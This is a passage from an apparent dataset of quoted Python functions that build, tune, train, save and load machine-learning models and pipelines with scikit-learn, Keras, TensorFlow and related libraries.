return pipeline", "def model_pipeline_run(index, model, params, X_train, y_train, X_test, y_test, model_name, pre_process_time, type):\n n_jobs = -1\n n_iter = 100\n if model is None:\n return\n try:\n row = {\"dataset_index\": index}\n if type == \"classification\":\n steps = [(\"classifier\", model)]\n else:\n steps = [(\"regressor\", model)]\n pipeline = MLPipeline(steps=steps)\n if type == \"classification\":\n if model_name == \"rf\":\n params[\"classifier__max_features\"] = [min([x, X_train.shape[1]]) for x in\n params[\"classifier__max_features\"]]\n elif \"dl\" in model_name:\n n_jobs = None\n params[\"classifier__shape\"] = [X_train.shape[1]]\n if isinstance(y_test[0], (str)):\n try:\n y_train = np.asarray(list(map(lambda x: int(re.search(\"[0-9]+\", x).group()), y_train)))\n y_test = np.asarray(list(map(lambda x: int(re.search(\"[0-9]+\", x).group()), y_test)))\n except Exception as e:\n le = LabelEncoder()\n y_train = le.fit_transform(y_train)\n y_test = le.transform(y_test)\n grid = RandomizedSearchCV(estimator=pipeline, param_distributions=params, cv=KFold(3), refit=True,\n verbose=0, n_jobs=n_jobs, n_iter=n_iter,\n scoring=\"f1\" if len(set(y_train)) == 2 else \"f1_weighted\")\n else:\n if model_name == \"rf\":\n params[\"regressor__max_features\"] = [min([x, X_train.shape[1]]) for x in\n params[\"regressor__max_features\"]]\n elif \"dl\" in model_name:\n n_jobs = None\n params[\"regressor__shape\"] = [X_train.shape[1]]\n grid = RandomizedSearchCV(estimator=pipeline, param_distributions=params, cv=KFold(3), refit=True,\n verbose=0, n_jobs=n_jobs, n_iter=n_iter, error_score=np.nan)\n model_time = time.time()\n columns = X_train.columns\n if \"dl-rnn\" in model_name:\n X_train = np.reshape(X_train.astype(\"float32\").values, (X_train.shape[0], 1, X_train.shape[1]))\n X_test = np.reshape(X_test.astype(\"float32\").values, (X_test.shape[0], 1, X_test.shape[1]))\n else:\n X_train = X_train.astype(\"float32\").values\n X_test = X_test.astype(\"float32\").values\n grid = grid.fit(X_train.astype(\"float32\"), y_train)\n row[\"time\"] = (time.time() - model_time) / 60\n row[\"pre_process_time\"] = pre_process_time\n return scoring(grid, X_train, X_test, y_train, y_test, columns, row=row, model_name=model_name, type=type)\n except Exception as e:\n print(e)", "def create(pdef):\n from sklearn.pipeline import Pipeline\n return [Pipeline(p) for p in pdef]", "def train_model(X, y, model_type, ngram_type, label_type):\n assert(label_type in ['oh', 'ed'])\n assert(model_type in ['linear', 'mlp'])\n assert(ngram_type in ['word', 'char'])\n\n # tensorflow models aren't fork safe, which means they can't be served via uwsgi\n # as work around, we can serve a pure sklearn model\n # we should be able to find another fix\n\n if label_type == 'oh' and model_type == 'linear':\n\n y = np.argmax(y, axis = 1)\n\n clf = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', LogisticRegression()),\n ])\n\n params = {\n 'vect__max_features': 10000,\n 'vect__ngram_range': (1,2),\n 'vect__analyzer' : ngram_type,\n 'tfidf__sublinear_tf' : True,\n 'tfidf__norm' :'l2',\n 'clf__C' : 10,\n }\n else:\n if label_type == 'oh':\n y = one_hot(y)\n print(np.unique(y))\n\n clf = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('to_dense', DenseTransformer()),\n ('clf', KerasClassifier(build_fn=make_mlp, output_dim = y.shape[1], verbose=False)),\n ])\n cv_results = pd.read_csv('cv_results.csv')\n query = \"model_type == '%s' and ngram_type == '%s' and label_type == '%s'\" % (model_type, ngram_type, label_type)\n params = cv_results.query(query)['best_params'].iloc[0]\n params = json.loads(params)\n print(\"parameters\", params)\n return clf.set_params(**params).fit(X,y)", "def load_pipeline():\n\n try:\n logging.info(\"Loading the fitted pipeline...\")\n with open(base.SAVED_MODEL_PATH, \"rb\") as model_file:\n pipeline = pickle.load(model_file)\n logging.info(\"Loading completed successfully...\")\n except FileNotFoundError:\n logging.error(\"Model file has not been found.\")\n raise\n return pipeline", "def get_sklearn_model(x):\n if is_sklearn_model(x):\n return x # already a valid model\n elif type(x) is dict:\n if hasattr(x, 'model'):\n return get_sklearn_model(x['model'])\n else:\n return None\n elif type(x) is str:\n # noinspection PyBroadException\n try:\n return get_sklearn_model(eval(x))\n except:\n pass\n return None", "def fit_transform(self, load_script=False):\n\n # Interpret the request data based on the expected row and column structure\n row_template = ['strData', 'strData']\n col_headers = ['model_name', 'n_features']\n feature_col_num = 1\n \n # An additional key field column is expected if the call is made through the load script\n if load_script:\n row_template = ['strData', 'strData', 'strData']\n col_headers = ['model_name', 'key', 'n_features']\n feature_col_num = 2\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Initialize the persistent model\n self.model = PersistentModel()\n \n # Get the model name from the request dataframe\n self.model.name = self.request_df.loc[0, 'model_name']\n \n # Get the model from cache or disk\n self._get_model()\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(3)\n \n # Check that the estimator is an unsupervised ML algorithm\n if self.model.estimator_type not in [\"decomposer\", \"clusterer\"]:\n err = \"Incorrect usage. The estimator specified is not a known decompostion or clustering algorithm: {0}\".format(self.model.estimator)\n raise Exception(err)\n\n if load_script:\n # Set the key column as the index\n self.request_df.set_index(\"key\", drop=False, inplace=True)\n\n # Split the features provided as a string into individual columns\n self.X = pd.DataFrame([x[feature_col_num].split(\"|\") for x in self.request_df.values.tolist()], columns=self.model.features_df.loc[:,\"name\"].tolist(),\\\n index=self.request_df.index)\n \n # Convert the data types based on feature definitions \n self.X = utils.convert_types(self.X, self.model.features_df)\n\n # Construct the preprocessor\n prep = Preprocessor(self.model.features_df, scale_hashed=self.model.scale_hashed, scale_vectors=self.model.scale_vectors,\\\n missing=self.model.missing, scaler=self.model.scaler, logfile=self.logfile, **self.model.scaler_kwargs)\n \n # Create a chache for the pipeline's transformers\n # https://scikit-learn.org/stable/modules/compose.html#caching-transformers-avoid-repeated-computation\n # cachedir = mkdtemp()\n\n # Construct a sklearn pipeline\n self.model.pipe = Pipeline([('preprocessor', prep)]) #, memory=cachedir)\n\n if self.model.dim_reduction:\n # Construct the dimensionality reduction object\n reduction = self.decomposers[self.model.reduction](**self.model.dim_reduction_args)\n \n # Include dimensionality reduction in the sklearn pipeline\n self.model.pipe.steps.insert(1, ('reduction', reduction))\n self.model.estimation_step = 2\n else:\n self.model.estimation_step = 1 \n\n # Construct an estimator\n estimator = self.algorithms[self.model.estimator](**self.model.estimator_kwargs)\n\n # Add the estimator to the sklearn pipeline\n self.model.pipe.steps.append(('estimator', estimator)) \n\n # Fit the data to the pipeline\n if self.model.estimator_type == \"decomposer\":\n # If the estimator is a decomposer we apply the fit_transform method at the end of the pipeline\n self.y = self.model.pipe.fit_transform(self.X)\n\n # Prepare the response\n self.response = pd.DataFrame(self.y, index=self.X.index)\n\n elif self.model.estimator_type == \"clusterer\":\n # If the estimator is a decomposer we apply the fit_predict method at the end of the pipeline\n self.y = self.model.pipe.fit_predict(self.X)\n\n # Prepare the response\n self.response = pd.DataFrame(self.y, columns=[\"result\"], index=self.X.index)\n \n # Clear the cache directory setup for the pipeline's transformers\n # rmtree(cachedir)\n \n # Update the cache to keep this model in memory\n self._update_cache()\n \n if load_script:\n # Add the key field column to the response\n self.response = self.request_df.join(self.response).drop(['n_features'], axis=1)\n \n # If the function was called through the load script we return a Data Frame\n if self.model.estimator_type == \"decomposer\":\n self._send_table_description(\"reduce\")\n elif self.model.estimator_type == \"clusterer\":\n self._send_table_description(\"cluster\")\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(4)\n \n return self.response\n \n # If the function was called through a chart expression we return a Series\n else:\n # Dimensionality reduction is only possible through the load script\n if self.model.estimator_type == \"decomposer\":\n err = \"Dimensionality reduction is only possible through the load script.\"\n raise Exception(err)\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(4)\n \n return self.response.loc[:,'result']", "def buildModel( self, transformer, classifier ):\n summitAIModel = make_pipeline ( transformer , classifier )\n summitAIModel.fit ( self.X , self.y )\n joblib.dump ( summitAIModel , self.modeldump )", "def __build_ml_pipeline(self, clf: MultiOutputClassifier) -> Pipeline:\r\n pipeline = Pipeline([\r\n ('features', FeatureUnion(\r\n [('text', Pipeline(\r\n [('text_field_extractor', \r\n basic_utils.TextFieldExtractor('message')), \r\n #('vect', CountVectorizer(tokenizer=clean_text)),\r\n #('tfidf', TfidfTransformer())\r\n ('tfidf', TfidfVectorizer(tokenizer=basic_utils.tokenize, \r\n min_df=.0025, max_df=0.25, \r\n ngram_range=(1,2)))\r\n ])),\r\n \r\n ('numerics', FeatureUnion(\r\n [('text_len', \r\n Pipeline([('text_len_extractor', \r\n basic_utils.NumericFieldExtractor('text_len')), \r\n ('text_len_scaler', StandardScaler())\r\n ])),\r\n ('punt_perc', \r\n Pipeline([('punt_perc_extractor', \r\n basic_utils.NumericFieldExtractor('punt_perc')), \r\n ('punt_perc_scaler', StandardScaler())\r\n ]))\r\n ])),\r\n ('starting_verb', basic_utils.PosFieldExtractor('starting_verb_flag'))\r\n ])),\r\n \r\n ('clf', clf)\r\n ])\r\n \r\n return pipeline", "def get_pipeline(features, to_matrix=True):\n feature_names = []\n for feature in features:\n feature_names += feature[1].FEATS\n if to_matrix:\n return Pipeline(features + [('transform', ToMatrix(features=feature_names)), ('norm', MinMaxScaler())])\n else:\n return Pipeline(features)", "def pipeline():\n\n test_pipeline = (Pipeline()\n .init_variable('current_loss')\n .init_model('model', C('model_class'),\n 'dynamic', C('model_config'))\n .to_array(dtype='float32')\n .train_model('model',\n inputs=B('images'),\n targets=B('labels'),\n outputs='loss',\n save_to=V('current_loss'))\n )\n return test_pipeline", "def get_pipelines(emo_best_model_dict, taskname, anal):\r\n parent_dir = Path.cwd().parent\r\n task_name = 'class_' #default\r\n analysis = 'model_anal_' # default\r\n\r\n if taskname == 'r':\r\n task_name = 'reg_'\r\n if anal != 'model':\r\n analysis = anal + '_anal_'\r\n\r\n prev_name = task_name + analysis\r\n emo_pipeline_dict = {}\r\n for emotion, best_model_prop in emo_best_model_dict.items(): # dataset, classifier, vectorizer, k\r\n #Change k = 0 for all_in features\r\n if best_model_prop[0] == 'all_in':\r\n best_model_prop[0] = str(0)\r\n pipeline_path = parent_dir.joinpath('default_results', 'pipelines_' + emotion, prev_name + emotion + '_' + best_model_prop[0] + '_' + best_model_prop[1]\r\n + '_' + best_model_prop[2] + '_' + best_model_prop[3] + '.pkl')\r\n print(pipeline_path)\r\n if os.path.exists(pipeline_path):\r\n pipeline = pd.read_pickle(pipeline_path)\r\n emo_pipeline_dict[emotion] = pipeline\r\n else:\r\n # If the file doesnt exist, exit the program with instructions\r\n print('\\nRequired files does not exist.\\nPlease, train the models and select the best model for the prediction task by running model_selection > Modelling.py')\r\n sys.exit(1)\r\n print(emo_pipeline_dict)\r\n return emo_pipeline_dict", "def get_model(\n model: PipelineModel,\n use_auth_token: Union[Text, None] = None,\n) -> Model:\n\n if isinstance(model, Model):\n pass\n\n elif isinstance(model, Text):\n model = Model.from_pretrained(\n model, use_auth_token=use_auth_token, strict=False\n )\n\n elif isinstance(model, Mapping):\n model.setdefault(\"use_auth_token\", use_auth_token)\n model = Model.from_pretrained(**model)\n\n else:\n raise TypeError(\n f\"Unsupported type ({type(model)}) for loading model: \"\n f\"expected `str` or `dict`.\"\n )\n\n model.eval()\n return model", "def buildModel (self , transformer, classifier ):\n for module in ('acct' , 'arch', 'bo', 'fo', 'risk'):\n summitAIModel = make_pipeline ( transformer , classifier )\n summitAIModel.fit ( self.X[self.ModuleData[module]], self.y[self.ModuleData[module]] )\n joblib.dump ( summitAIModel, self.modelDumps[module] )", "def buildModel (self , transformer, classifier ):\n for module in ('acct' , 'arch', 'bo', 'fo', 'risk'):\n summitAIModel = make_pipeline ( transformer , classifier )\n summitAIModel.fit ( self.X[self.ModuleData[module]], self.y[self.ModuleData[module]] )\n joblib.dump ( summitAIModel, self.modelDumps[module] )", "def _parse_model(model: str, num_classes: int) -> Callable[[], tf.keras.Model]:\n if model == 'cnn':\n keras_model_builder = functools.partial(\n create_conv_dropout_model, num_classes=num_classes)\n elif model in ['resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152']:\n keras_model_builder = functools.partial(\n getattr(resnet_models, f'create_{model}'),\n input_shape=(28, 28, 1),\n num_classes=num_classes)\n else:\n raise ValueError(\n 'Cannot handle model flag [{!s}], must be one of {!s}.'.format(\n model, _EMNIST_MODELS))\n return keras_model_builder", "def build(model_name):\n return pretrain.factory.create(model_name)", "def get_linear_model():\n\n ss = StandardScaler()\n lr = LogisticRegression(penalty='l2', max_iter=1000, class_weight=None) # ridge\n\n lr_model = Pipeline(steps=(['scale', ss], ['clf', lr])) # pipeline\n\n lr_model_params = {\n 'clf__C':loguniform(1e-3,1e3)\n }\n\n # model: classifier with randomised parameter search over nested 3-fold CV\n linear_model = RandomizedSearchCV(lr_model, lr_model_params, n_iter=100, cv=3)\n\n return clone(linear_model)", "def build_own_pipeline() -> Pipeline:\n nn_pipeline = None\n\n nn_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', MLPClassifier()) \n ])\n \n return nn_pipeline", "def _build(self,\n model_type: str,\n **kwargs) -> Predictor:\n if model_type == 'classifier':\n modelcls = sklearn.gaussian_process.GaussianProcessClassifier\n elif model_type == 'regressor':\n modelcls = sklearn.gaussian_process.GaussianProcessRegressor\n else:\n raise ValueError(\n '`model_type` should be \"classifier\" or \"regressor\"')\n model = modelcls(**kwargs)\n return model", "def get_linear_model(params):\n\n ss = StandardScaler()\n lr = ElasticNet(selection='random', random_state=42) # EN\n\n if params['pca']:\n pca = PCA(n_components=params['pca_comps'], whiten=True)\n lr_model = Pipeline(steps=(['scale', ss], ['pca', pca], ['model', lr])) # pipeline\n else:\n lr_model = Pipeline(steps=(['scale', ss], ['model', lr])) # pipeline\n\n lr_model_params = {\n 'model__alpha': loguniform(1e-1, 1e3),\n 'model__l1_ratio': uniform(0.1, .9)\n }\n\n # model: classifier with randomised parameter search over nested 3-fold CV\n linear_model = RandomizedSearchCV(lr_model, lr_model_params, n_iter=500, cv=5)\n\n return clone(linear_model)", "def build_model(): \n \n \n pipeline = Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),('tfidf', TfidfTransformer()),\n ('MLC', MultiOutputClassifier(KNeighborsClassifier()))])\n \n parameters = {'MLC__estimator__n_neighbors': [3,5],'MLC__estimator__leaf_size':[10,20,30] }\n custom_recall = make_scorer(recall_score,average='weighted')\n\n cv = GridSearchCV(pipeline, param_grid = parameters, n_jobs = -1, verbose=2)\n\n\n return cv", "def import_sklearn_models(module):\n models = [d for d in dir(module) if hasattr(getattr(module, d), 'fit_transform')]\n for m in models:\n exec(f'from {module.__name__} import {m}', globals())\n return models", "def to_regressor(model_fn: Callable, kwargs) -> KerasRegressor:\n return KerasRegressor(model_fn, **kwargs)", "def load_model(model):\n generator = tf.keras.models.load_model(model, custom_objects=custom_objects)\n return generator", "def predict_model():\n data = request.json\n\n if data:\n predictor.pred_dict[\"model\"] = data[\"model\"]\n else:\n pass\n\n return 'Non tam praeclarum est scire latine, quam turpe nescire'", "def to_sklearn(self):\n import sklearn.pipeline as skp\n\n steps = []\n for step in self.steps:\n steps += [(step[0], step[1].to_sklearn())]\n return skp.Pipeline(steps)", "def _scaling_model_from_dict(obj):\n for entry_point in pkg_resources.iter_entry_points(\"dxtbx.scaling_model_ext\"):\n if entry_point.name == obj[\"__id__\"]:\n return entry_point.load().from_dict(obj)", "def model_fn(model_dir):\n \n sym, arg_params, aux_params = mx.model.load_checkpoint('%s/102flowers' % model_dir, 0)\n mod = mx.mod.Module(symbol=sym, context=mx.cpu(), label_names=None)\n mod.bind(for_training=False, data_shapes=[('data', (1,3,224,224))], label_shapes=mod._label_shapes)\n mod.set_params(arg_params, aux_params, allow_missing=True)\n return mod", "def _model_fn(features, labels, mode, config):\n return _transformer_model_fn(\n features=features,\n labels=labels,\n mode=mode,\n head=head_lib._regression_head_with_mean_squared_error_loss(\n label_dimension=label_dimension,\n weight_column=weight_column,\n loss_reduction=loss_reduction),\n num_layers=num_layers,\n d_model=d_model,\n num_heads=num_heads,\n dff=dff,\n input_vocab_size=input_vocab_size,\n target_vocab_size=target_vocab_size,\n output_size=output_size,\n feature_columns=tuple(feature_columns or []),\n optimizer=optimizer,\n dropout=dropout,\n input_layer_partitioner=input_layer_partitioner,\n config=config,\n data_conf=data_conf)", "def apply_sklearn_model(model, data, *args, mode='fit_transform', return_model=False, **kwargs):\n assert mode in ['fit', 'transform', 'fit_transform']\n if type(model) is list:\n models = []\n for i, m in enumerate(model):\n if (i < len(model) - 1) and ('transform' not in mode):\n temp_mode = 'fit_transform'\n else:\n temp_mode = mode\n\n data, m = apply_sklearn_model(m, data, *args, mode=temp_mode, return_model=True, **kwargs)\n models.append(m)\n\n if return_model:\n return data, models\n else:\n return data\n elif type(model) is dict:\n assert all([k in model.keys() for k in ['model', 'args', 'kwargs']]), ValueError(f'invalid model: {model}')\n return apply_sklearn_model(model['model'], data, *[*model['args'], *args], mode=mode, return_model=return_model,\n **update_dict(model['kwargs'], kwargs))\n\n model = get_sklearn_model(model)\n if model is None:\n raise RuntimeError(f'unsupported model: {model}')\n model = apply_defaults(model)(*args, **kwargs)\n\n m = getattr(model, mode)\n transformed_data = m(data)\n if return_model:\n return transformed_data, {'model': model, 'args': args, 'kwargs': kwargs}\n return transformed_data", "def build_model(self, user_defined_model):\n if user_defined_model is None:\n if os.path.exists(self.model_pkl_fname):\n logger.info('Loading model pkl file {}'.format(self.model_pkl_fname))\n model = load_generic(self.model_pkl_fname)\n else:\n logger.info('Building default model based on dihedrals')\n\n # build a lag time of 1 ns for tICA and msm\n # if the stride is too big and we can't do that\n # use 1 frame and report how much that is in ns\n if self.app.meta is not None:\n lag_time = max(1, int(1 / self.timestep))\n logger.info('Using a lag time of {} ns for the tICA and MSM'.format(lag_time * self.timestep))\n else:\n self.timestep = None\n lag_time = 1\n logger.warning('Cannot determine timestep. Defaulting to 1 frame.'.format(lag_time))\n model = Pipeline([\n ('feat', DihedralFeaturizer()),\n ('scaler', RobustScaler()),\n ('tICA', tICA(lag_time=lag_time, commute_mapping=True, n_components=10)),\n ('clusterer', MiniBatchKMeans(n_clusters=200)),\n ('msm', MarkovStateModel(lag_time=lag_time, ergodic_cutoff='off', reversible_type=None))\n ])\n else:\n if not isinstance(user_defined_model, Pipeline):\n raise ValueError('model is not an sklearn.pipeline.Pipeline object')\n else:\n logger.info('Using user defined model')\n model = user_defined_model\n return model", "def build_feature_transform():\n\n # These features can be parsed as numeric.\n\n numeric = HEADER.as_feature_indices(\n [\n 'Unnamed: 0', 'V1', 'V2', 'V3', 'V4', 'V5', 'V6', 'V7', 'V8', 'V9',\n 'V10', 'V11', 'V12', 'V13', 'V14', 'V15', 'V16', 'V17', 'V18',\n 'V19', 'V20', 'V21', 'V22', 'V23', 'V24', 'V25', 'V26', 'V27',\n 'V28', 'amt'\n ]\n )\n\n # These features contain a relatively small number of unique items.\n\n categorical = HEADER.as_feature_indices(['amt'])\n\n numeric_processors = Pipeline(\n steps=[\n (\n 'robustimputer',\n RobustImputer(strategy='constant', fill_values=nan)\n )\n ]\n )\n\n categorical_processors = Pipeline(\n steps=[\n ('thresholdonehotencoder', ThresholdOneHotEncoder(threshold=635))\n ]\n )\n\n column_transformer = ColumnTransformer(\n transformers=[\n ('numeric_processing', numeric_processors, numeric\n ), ('categorical_processing', categorical_processors, categorical)\n ]\n )\n\n return Pipeline(\n steps=[\n ('column_transformer', column_transformer\n ), ('robuststandardscaler', RobustStandardScaler())\n ]\n )", "def train(self, model, args):\n if model == self.WORD_DET_RFC:\n return self.train_rfc(args)\n elif model == self.REGRESSION_PARAMS:\n return self.train_bb_reg(args)\n else:\n raise Exception('No model %s exists to train' % model)", "def get_ensemble_model():\n ss = StandardScaler()\n xgb_clf = xgb.XGBClassifier(objective=\"binary:logistic\", random_state=42)\n\n xgb_model = Pipeline(steps=(['scale', ss], ['clf', xgb_clf]))\n\n xgb_model_params = {\n \"clf__colsample_bytree\": uniform(0.5, 0.5), # default 1\n \"clf__gamma\": loguniform(1e-1, 1e3), # default 0\n \"clf__learning_rate\": uniform(0.03, 0.57), # default 0.3\n \"clf__max_depth\": randint(2, 5), # default 3\n \"clf__n_estimators\": randint(10, 50), # default 100\n \"clf__subsample\": uniform(0.5, 0.25), # default 1\n \"clf__min_child_weight\": randint(1, 8) # default 1\n }\n\n # model: classifier with randomised parameter search over nested 3-fold CV (more iters to account for large space)\n ensemble_model = RandomizedSearchCV(xgb_model, xgb_model_params, n_iter=250, cv=3)\n\n return clone(ensemble_model)", "def get_bert_clf():\n model = tf.keras.models.model_from_json(get_object('distilbert_model.json', 'r'))\n model.load_weights(model_dir/'distilbert_weights.hdf5')\n return model", "def buildModel(model_name):\n if model_name == \"resnet50\":\n model = kapp.resnet50.ResNet50(weights=\"imagenet\", include_top=False)\n return model, kapp.resnet50.preprocess_input\n elif model_name == \"vgg16\":\n model = kapp.vgg16.VGG16(weights=\"imagenet\", include_top=False)\n return model, kapp.vgg16.preprocess_input\n elif model_name == 'xception':\n model = kapp.xception.Xception(weights=\"imagenet\", include_top=False)\n return model, kapp.xception.preprocess_input\n elif model_name == 'vgg19':\n model = kapp.vgg19.VGG19(weights=\"imagenet\", include_top=False)\n return model, kapp.vgg19.preprocess_input\n elif model_name == 'inceptionv3':\n model = kapp.inception_v3.InceptionV3(weights=\"imagenet\", include_top=False)\n return model, kapp.inception_v3.preprocess_input\n elif model_name == 'mobilenet':\n model = kapp.mobilenet.MobileNet(weights=\"imagenet\", include_top=False)\n return model, kapp.mobilenet.preprocess_input\n else:\n raise Exception(\"Unsupported model error\")", "def get_estimator(arguments):\n \n numerical_indices = [1, 2, 4, 5,6,7,8,9,10,11,12,13,14]\n categorical_indices = [0]\n original_indices = list(set(range(59))-set(numerical_indices)-set(categorical_indices))\n \n p1 = make_pipeline(my_module.PositionalSelector(categorical_indices),OneHotEncoder())\n p2 = make_pipeline(my_module.PositionalSelector(numerical_indices),StandardScaler())\n p3 = make_pipeline(my_module.PositionalSelector(original_indices))\n \n feats = FeatureUnion([('categoricals', p1),\n ('numericals', p2),\n ('originals', p3),])\n \n # tolerance and C are expected to be passed as\n # command line argument to task.py\n pipeline = Pipeline([('pre', feats),\n ('estimator', linear_model.LogisticRegression(penalty=\"l2\",\n tol=arguments.tol,\n C = arguments.C,\n solver='lbfgs',\n max_iter=10000))])\n \n # tolerance and C are expected to be passed as\n # command line argument to task.py\n #classifier = linear_model.LogisticRegression(\n # penalty=\"l2\",\n # tol=arguments.tol,\n # C = arguments.C,\n # solver='lbfgs',\n # max_iter=1000\n #)\n \n return pipeline", "def generate_models(clf_library):\n clf_list = []\n for i in clf_library:\n param_dict = i['param_dict']\n dict_list = [dict(izip_longest(param_dict, v)) for v in product(*param_dict.values())]\n clf_list = clf_list+[i['clf'](**param_set) for param_set in dict_list]\n return clf_list", "def apply_model(pfi_fitted_models, x):\n model_params = pickle.load(open(pfi_fitted_models, 'rb'))\n model = MLPClassifier()\n model.set_params(**model_params)\n y = model.predict(x)\n model.predict_proba(x)\n return y", "def build_model(train_inputs,train_labels,model_params,model_mode='classification',\n model_type='naive_bayes'):\n if model_mode == \"classification\":\n if model_type == \"naive_bayes\":\n model = GaussianNB()\n if model_type == \"knn\":\n model = KNeighborsClassifier(n_neighbors=50)\n if model_type == \"svm\":\n model = SVC(kernel='poly', degree =27, coef0 =1, C=5)\n if model_type == \"decision_tree\":\n model = DecisionTreeClassifier(min_samples_split=45,min_samples_leaf=45,criterion=\"gini\")\n #model = RandomForestClassifier(n_estimators=500, n_jobs=-1)\n\n if model_mode == \"regression\":\n if model_type == \"knn\":\n model = KNeighborsRegressor()\n if model_type == \"svm\":\n model = SVR()\n if model_type == \"decision_tree\":\n model = DecisionTreeRegressor()\n\n\n model.fit(train_inputs, train_labels)\n # for name, score in zip(train_inputs.columns,model.feature_importances_):\n # print(name, score)\n\n return model", "def fit_model(X_train, X_test, y_train, y_test, model):\n \n if model == 'LinearRegression':\n \n regressor=LinearRegression()\n regressor.fit(X_train,y_train)\n y_pred =regressor.predict(X_test)\n r2 = r2_score(y_test, y_pred)\n \n elif model == 'Lasso':\n \n lasso = Lasso()\n lasso.fit(X_train, y_train)\n lasso_pred = lasso.predict(X_test)\n r2 = r2_score(y_test, lasso_pred)\n\n elif model == 'Ridge':\n \n ridge = Ridge()\n ridge.fit(X_train, y_train)\n ridge_pred = ridge.predict(X_test)\n r2 = r2_score(y_test, ridge_pred)\n \n \n else:\n model = make_pipeline(PolynomialFeatures(2), LinearRegression())\n model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n r2= r2_score(y_test,y_pred)\n\n\n return r2", "def build(classifier, X, y=None, ngram_range=(1,1), max_features=None):\n if isinstance(classifier, type):\n classifier = classifier()\n\n model = Pipeline([\n ('vectorizer', TfidfVectorizer(\n ngram_range=ngram_range,\n stop_words='english',\n max_features=max_features\n )),\n ('classifier', classifier),\n ])\n\n model.fit(X, y)\n return model", "def build_model(category_names):\n try:\n # initialise columns to be used for data preparation purposes in the model pipeline\n message_col = 0\n\n # build a pipeline containing the feature transformations and estimator\n pipeline = Pipeline([\n\n ('features', ColumnTransformer([\n # apply message transformations\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=partial(tokenize))),\n ('tfidf', TfidfTransformer())\n ]), message_col),\n\n ('starting_verb', StartingVerbExtractor(), message_col),\n\n ('category_terms', CategoryTermExtractor(category_names=category_names),\n message_col),\n\n ], remainder='drop')),\n\n # specify the estimator\n ('clf', LabelPowerset(MultinomialNB(fit_prior=True)))\n ])\n\n # parameter grid to be used for grid search\n parameters = {\n 'features__text_pipeline__vect__max_features': [10000],\n 'features__text_pipeline__tfidf__sublinear_tf': [True],\n 'features__text_pipeline__vect__ngram_range': [(1,1), (1,2)],\n 'features__text_pipeline__vect__min_df': [1],\n 'features__text_pipeline__vect__max_df': [.95],\n 'features__text_pipeline__tfidf__smooth_idf': [True],\n 'features__text_pipeline__tfidf__norm': ['l2'],\n 'clf__classifier__alpha': [0.01, 1.]\n }\n\n # perform cross validation using grid search on the pipeline described above\n cv = GridSearchCV(pipeline, param_grid=parameters, cv=5, verbose=2)\n return cv\n except:\n raise Exception(\"Could not build model.\")\n #finally:\n # return cv", "def get_transformer(model_name):\n model_class, tokenizer_class, pretrained_weights = TRANSFORMER_MODELS[model_name]\n model = model_class.from_pretrained(pretrained_weights,\n output_hidden_states=True)\n tokenizer = tokenizer_class.from_pretrained(pretrained_weights)\n\n return model, tokenizer, TRANSFORMER_EMBEDDING_DIMS[model_name]", "def regression_model_dict() -> dict:\n return {\n \"LinearRegression\": createModel(\"LinearRegression\", \"regression\"),\n \"Ridge\": createModel(\"Ridge\", \"regression\"),\n \"Lasso\": createModel(\"Lasso\", \"regression\"),\n \"ElasticNet\": createModel(\"ElasticNet\", \"regression\"),\n \"KNeighborsRegressor\": createModel(\"KNeighborsRegressor\", \"regression\"),\n \"DecisionTreeRegressor\": createModel(\"DecisionTreeRegressor\", \"regression\"),\n \"AdaBoostRegressor\": createModel(\"AdaBoostRegressor\", \"regression\"),\n \"BaggingRegressor\": createModel(\"BaggingRegressor\", \"regression\"),\n \"ExtraTreesRegressor\": createModel(\n \"ExtraTreesRegressor\", \"regression\", n_estimators=100\n ),\n \"GradientBoostingRegressor\": createModel(\n \"GradientBoostingRegressor\", \"regression\"\n ),\n \"RandomForestRegressor\": createModel(\n \"RandomForestRegressor\", \"regression\", n_estimators=100\n ),\n \"XGBoost\": createModel(\"XGBoostRegressor\", \"regression\", num_boost_round=100),\n \"LightGBM\": createModel(\"LightGBMRegressor\", \"regression\", num_boost_round=100),\n }", "def similar_bonds_pipeline():\n pipeline = Pipeline(\n steps=[\n ('scaler', StandardScaler()),\n #('encoder', OneHotEncoder()),\n ('pca', PCA(n_components=3)),\n ('knn', KNN()),\n ]\n )\n return pipeline", "def load_model(model, trained_models_dir, image_name):\n# if model == \"keras\":\n if model == 1:\n return load_keras_model(trained_models_dir, image_name)\n# elif model == \"lgb\":\n elif model == 3:\n return load_lgb_model(trained_models_dir, image_name)\n# elif model = \"sklearn\":\n else:\n return load_joblib_model(trained_models_dir, image_name)", "def classifier(model):\n \n model.classifier = nn.Sequential(OrderedDict([\n ('fc1', nn.Linear(model.classifier[0].in_features, 4096)),\n ('fc2', nn.Linear(4096, 102)),\n ('relu', nn.ReLU()),\n ('output', nn.LogSoftmax(dim=1))\n ]))\n return model", "def model(self) -> PipelineModel:\n return self._model", "def build_probe_model(modelpath):\n \n from keras.models import load_model\n model = load_model(modelpath)\n layers = model.layers\n \n outputs = return_concat_layers(layers)\n \n # append final output to keep track of prediction\n outputs.append(model.output)\n\n from keras.models import Model\n probe_model = Model(input=model.input, output=outputs)\n \n return probe_model", "def predict(data, model: str = None, **kwargs):\n\n model_instance = get_model(model)\n log.debug(\"Predict with \" + str(model_instance))\n return model_instance.predict(data, **kwargs)", "def gensim_to_keras(model):\n layer = model.wv.get_keras_embedding()\n return (layer)", "def train_model(x_data, y_data, model_type):\n # def lr model object\n clr = None\n try:\n clr = model_list[model_type]()\n except Exception as e:\n print(e)\n # fit model\n clr.fit(x_data, y_data)\n # save model in pkl file\n try:\n joblib.dump(clr, \"model/\" + model_type + \".pkl\")\n except Exception as e:\n print(e)\n return clr", "def get_model_pipeline_from_file(self, oc):\r\n # Load model related files\r\n model_path = self.config['DATA_PATH'] + self.config['CUSTOMER_NAME'] + '/models/'\r\n\r\n model_file = model_path + self.task + '_' + str(oc) + 